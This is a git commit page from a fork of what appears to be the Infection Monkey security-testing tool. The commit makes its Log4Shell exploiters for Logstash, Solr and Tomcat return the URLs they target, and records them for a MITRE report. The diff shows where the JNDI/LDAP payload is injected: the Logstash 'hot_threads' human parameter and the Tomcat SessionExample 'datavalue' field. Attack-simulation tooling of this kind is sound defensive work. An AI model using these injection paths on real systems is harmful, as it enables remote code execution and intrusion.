forked from p34709852/monkey
Agent: add vulnerable log4shell url's
Url's are used in mitre report
This commit is contained in:
vakarisz
parent
75ed119c00
commit
189505a97d
|
|
@ -143,7 +143,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
for exploit in get_log4shell_service_exploiters():
|
for exploit in get_log4shell_service_exploiters():
|
||||||
for port in self._open_ports:
|
for port in self._open_ports:
|
||||||
try:
|
try:
|
||||||
exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
logger.warning(
|
logger.warning(
|
||||||
"An error occurred while attempting to exploit log4shell on a "
|
"An error occurred while attempting to exploit log4shell on a "
|
||||||
|
|
@ -155,6 +155,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
"service_name": exploit.service_name,
|
"service_name": exploit.service_name,
|
||||||
"port": port,
|
"port": port,
|
||||||
}
|
}
|
||||||
|
self.exploit_info["vulnerable_urls"].append(url)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
|
||||||
|
|
@ -12,5 +12,6 @@ class IServiceExploiter(metaclass=abc.ABCMeta):
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
@abc.abstractmethod
|
@abc.abstractmethod
|
||||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
def trigger_exploit(payload: str, host: VictimHost, port: int) -> str:
|
||||||
|
# Return the URL the exploit was attempted on
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|
|
||||||
|
|
@ -15,6 +15,8 @@ class LogStashExploit(IServiceExploiter):
|
||||||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||||
url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
|
url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
|
||||||
try:
|
try:
|
||||||
resp = requests.get(url, timeout=5, verify=False) # noqa DUO123
|
requests.get(url, timeout=5, verify=False) # noqa DUO123
|
||||||
except requests.ReadTimeout as e:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug(f"Log4shell request failed {e}")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
||||||
|
return url
|
||||||
|
|
|
||||||
|
|
@ -18,3 +18,5 @@ class SolrExploit(IServiceExploiter):
|
||||||
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||||
except requests.ReadTimeout as e:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug(f"Log4shell request failed {e}")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
||||||
|
return url
|
||||||
|
|
|
||||||
|
|
@ -16,6 +16,8 @@ class TomcatExploit(IServiceExploiter):
|
||||||
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
|
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
|
||||||
payload = {"dataname": "foo", "datavalue": payload}
|
payload = {"dataname": "foo", "datavalue": payload}
|
||||||
try:
|
try:
|
||||||
resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||||
except requests.ReadTimeout as e:
|
except requests.ReadTimeout as e:
|
||||||
logger.debug(f"Log4shell request failed {e}")
|
logger.debug(f"Log4shell request failed {e}")
|
||||||
|
|
||||||
|
return url
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue